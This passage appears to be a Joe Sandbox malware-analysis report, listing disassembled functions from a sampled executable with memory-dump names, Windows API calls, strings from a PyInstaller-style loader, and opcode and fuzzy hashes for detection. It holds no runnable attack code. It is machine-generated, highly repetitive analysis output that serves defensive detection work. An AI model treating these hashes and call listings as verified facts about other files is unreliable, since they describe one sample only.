                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3723044601-27947307
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aab539b93ffeac37e32982e6298ac4f9f3ab9a0e846f993d4d23bb2dfd97e0ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0ea53d07e05d464a5349fd165cf1395b0893619832ed08cfab398200597492bb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aab539b93ffeac37e32982e6298ac4f9f3ab9a0e846f993d4d23bb2dfd97e0ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B21B422A08B4286EB10CF12E8442797762FF46B80F946135DA0DC3794EFBEE412E309
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID: f$p$p
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-1995029353
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ebd77cfec5ba1ae73d4d44f0362c433396c50ab1913f70ac6a64ba074246bfc5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D712C423E0C14386FB349E14D0547B97291EB4A754F84E135E68B876C4EF3EE592EB0A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                                                                                                                                  • API String ID: 626452242-876015163
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a20b0b5ed8276b533e9075527801bd2e9cd7712b6a2c346206ed433b7f82c893
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e3bd6c9cadd86e2f2ad2991d47cf8dbdf1f6ebeeda3bc620ad95f2821253971e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a20b0b5ed8276b533e9075527801bd2e9cd7712b6a2c346206ed433b7f82c893
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6741C333A08B42C2E750DF15E44427A73A6FB46B90F546135DA8D87BA4EF3DD022E705
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B37A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E1B326FB), ref: 00007FF6E1B37A9A
                                                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6E1B367F1,?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B364FF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32770: MessageBoxW.USER32 ref: 00007FF6E1B32845
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6E1B364D6
                                                                                                                                                                                                                                                                                                                                  • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6E1B36513
                                                                                                                                                                                                                                                                                                                                  • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6E1B3655A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                                                                                  • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 36c323d19424fe0ac76ca925b523eb1a2808b36d4a593579a88913e209ccb6ab
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: abc2ba63c3643a0d67d979feb96d0951a850195fcde63edb693c4fd8ee7cc010
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36c323d19424fe0ac76ca925b523eb1a2808b36d4a593579a88913e209ccb6ab
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32310013F1C74682FB21D725D4193BA31556F4A7C0F846031DA4EC27D6FE6EE115A70A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E1B3D1CA,?,?,?,00007FF6E1B3CEBC,?,?,00000001,00007FF6E1B3CAD9), ref: 00007FF6E1B3CF9D
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6E1B3D1CA,?,?,?,00007FF6E1B3CEBC,?,?,00000001,00007FF6E1B3CAD9), ref: 00007FF6E1B3CFAB
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E1B3D1CA,?,?,?,00007FF6E1B3CEBC,?,?,00000001,00007FF6E1B3CAD9), ref: 00007FF6E1B3CFD5
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF6E1B3D1CA,?,?,?,00007FF6E1B3CEBC,?,?,00000001,00007FF6E1B3CAD9), ref: 00007FF6E1B3D01B
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6E1B3D1CA,?,?,?,00007FF6E1B3CEBC,?,?,00000001,00007FF6E1B3CAD9), ref: 00007FF6E1B3D027
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 96cc8d1137d818a2009be7de16c2cee15406677aaf285b7c4d33305375866f21
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: acdbb52eb5a2ec0d9db1cdb7a86e433207c6533e3ba943fd5ef9843b6b7f8cc9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96cc8d1137d818a2009be7de16c2cee15406677aaf285b7c4d33305375866f21
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39310423A2A64292EF119B12A81477873D4FF4EFE0F892535DD1D86380DF7EE056970A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E1B326FB), ref: 00007FF6E1B37A9A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E1B37774,?,?,?,?,?,?,?,?,?,?,?,00007FF6E1B3101D), ref: 00007FF6E1B32654
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32620: MessageBoxW.USER32 ref: 00007FF6E1B32730
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E1B326FB), ref: 00007FF6E1B37B20
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3723044601-876015163
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ef0c7189470ede6921ef3de76a81d580bff1fc53629992aced72f99ea96e9165
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d6515c51fe1e5cc1ccc015318e57ae47bf0fad9f15ffa70b6575a4fbaecdc7ce
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef0c7189470ede6921ef3de76a81d580bff1fc53629992aced72f99ea96e9165
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E218523B08A4282EB50DB25F84026AB362FF8A7C4F585135DB4CC3BA9EF7DD5529705
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F,?,?,?,00007FF6E1B49343), ref: 00007FF6E1B4A65F
                                                                                                                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F,?,?,?,00007FF6E1B49343), ref: 00007FF6E1B4A674
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F,?,?,?,00007FF6E1B49343), ref: 00007FF6E1B4A695
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F,?,?,?,00007FF6E1B49343), ref: 00007FF6E1B4A6C2
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F,?,?,?,00007FF6E1B49343), ref: 00007FF6E1B4A6D3
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F,?,?,?,00007FF6E1B49343), ref: 00007FF6E1B4A6E4
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF6E1B52463,?,?,?,00007FF6E1B4CBBC,?,?,00000000,00007FF6E1B43A8F,?,?,?,00007FF6E1B49343), ref: 00007FF6E1B4A6FF
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e1c5b1d991a3ba091ed7e8305bf8a263b0c3bab683fa35b43ab2c2e69bd206d8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 728ad58d7e9e26d6356e2302fa486f381fb171bdbc4aeb000caefbc8d0b2c7fb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1c5b1d991a3ba091ed7e8305bf8a263b0c3bab683fa35b43ab2c2e69bd206d8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521B322A1C25241FB245732955137971514F8A7B0F04A734E83FC77C6FF2EB402620B
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d13b7e00a7b1d8a536c46895e540f46f3484fbd86751f3a2d7f4362bbfcc167c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3511B222B28B4186E3509B23E85432973A2FB9AFE4F441234EA5DC7794CF3ED9048749
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6E1B4447D,?,?,?,?,00007FF6E1B4DDD7,?,?,00000000,00007FF6E1B4A8E6,?,?,?), ref: 00007FF6E1B4A7D7
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B4447D,?,?,?,?,00007FF6E1B4DDD7,?,?,00000000,00007FF6E1B4A8E6,?,?,?), ref: 00007FF6E1B4A80D
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B4447D,?,?,?,?,00007FF6E1B4DDD7,?,?,00000000,00007FF6E1B4A8E6,?,?,?), ref: 00007FF6E1B4A83A
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B4447D,?,?,?,?,00007FF6E1B4DDD7,?,?,00000000,00007FF6E1B4A8E6,?,?,?), ref: 00007FF6E1B4A84B
                                                                                                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6E1B4447D,?,?,?,?,00007FF6E1B4DDD7,?,?,00000000,00007FF6E1B4A8E6,?,?,?), ref: 00007FF6E1B4A85C
